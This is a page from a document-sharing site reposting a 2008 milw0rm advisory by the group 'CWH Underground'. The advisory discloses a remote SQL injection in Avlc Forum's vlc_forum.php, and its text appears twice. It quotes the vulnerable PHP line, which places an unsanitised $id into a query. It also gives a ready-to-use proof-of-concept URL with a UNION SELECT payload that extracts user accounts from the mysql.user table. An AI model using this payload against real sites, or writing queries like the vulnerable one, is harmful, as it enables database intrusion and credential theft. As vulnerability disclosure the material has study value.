About Global Documents
Global Documents provides you with documents from around the globe on a variety of topics for your enjoyment.
Global Documents utilizes edocr for all its document needs due to edocr's wonderful content features. Thousands of professionals and businesses around the globe publish marketing, sales, operations, customer service and financial documents making it easier for prospects and customers to find content.
1 ====================================================================
2 Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
3 ====================================================================
4
5 ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
6 | ||||||||| ‘−−−−−−−−’ | O
.. CWH Underground Hacking Team ..
7 ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
8 ‘\_,−−−−−−−, _________________________|
9 / XXXXXX /‘| /
10 / XXXXXX / ‘\ /
11 / XXXXXX /\______(
12 / XXXXXX /
13 / XXXXXX /
14 (________(
15 ‘−−−−−−’
16
17
18 AUTHOR : CWH Underground
19 DATE : 12 July 2008
20 SITE : cwh.citec.us
21
22
23 #####################################################
24 APPLICATION : Avlc Forum
25 VERSION : N/A
26 VENDOR : N/A
27 DOWNLOAD : http://www.easy−script.com/compt.php?id=2147
28 #####################################################
29
30 −− Remote SQL Injection −−−
31
32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
33 Vulnerable File [vlc_forum.php]
34 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
35
36 @Line
37
38 141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
39 142: $req = mysql_query($sql) or die(’Erreur SQL !’.$sql.’
’ . mysql_error());
40
41
42 −−−−−−−−−−−−−
43 POC Exploit
44 −−−−−−−−−−−−−
45
46 [+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=−999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7
,8,9/**/FROM/**/mysql.user−−
47
48
49 #####################################################################
50 Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
51 Special Thx : asylu3, str0ke, citec.us, milw0rm.com
Page 1/2
Avlc Forum vlc_forum.php id Remote SQL Injection Vulnerability
CWH Underground
07/12/2008
52 #####################################################################
53
54 # milw0rm.com [2008−07−12]
Page 2/2
Avlc Forum vlc_forum.php id Remote SQL Injection Vulnerability
CWH Underground
07/12/2008
2 Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
3 ====================================================================
4
5 ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
6 | ||||||||| ‘−−−−−−−−’ | O
.. CWH Underground Hacking Team ..
7 ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
8 ‘\_,−−−−−−−, _________________________|
9 / XXXXXX /‘| /
10 / XXXXXX / ‘\ /
11 / XXXXXX /\______(
12 / XXXXXX /
13 / XXXXXX /
14 (________(
15 ‘−−−−−−’
16
17
18 AUTHOR : CWH Underground
19 DATE : 12 July 2008
20 SITE : cwh.citec.us
21
22
23 #####################################################
24 APPLICATION : Avlc Forum
25 VERSION : N/A
26 VENDOR : N/A
27 DOWNLOAD : http://www.easy−script.com/compt.php?id=2147
28 #####################################################
29
30 −− Remote SQL Injection −−−
31
32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
33 Vulnerable File [vlc_forum.php]
34 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
35
36 @Line
37
38 141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
39 142: $req = mysql_query($sql) or die(’Erreur SQL !’.$sql.’
’ . mysql_error());
40
41
42 −−−−−−−−−−−−−
43 POC Exploit
44 −−−−−−−−−−−−−
45
46 [+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=−999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7
,8,9/**/FROM/**/mysql.user−−
47
48
49 #####################################################################
50 Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
51 Special Thx : asylu3, str0ke, citec.us, milw0rm.com
Page 1/2
Avlc Forum vlc_forum.php id Remote SQL Injection Vulnerability
CWH Underground
07/12/2008
52 #####################################################################
53
54 # milw0rm.com [2008−07−12]
Page 2/2
Avlc Forum vlc_forum.php id Remote SQL Injection Vulnerability
CWH Underground
07/12/2008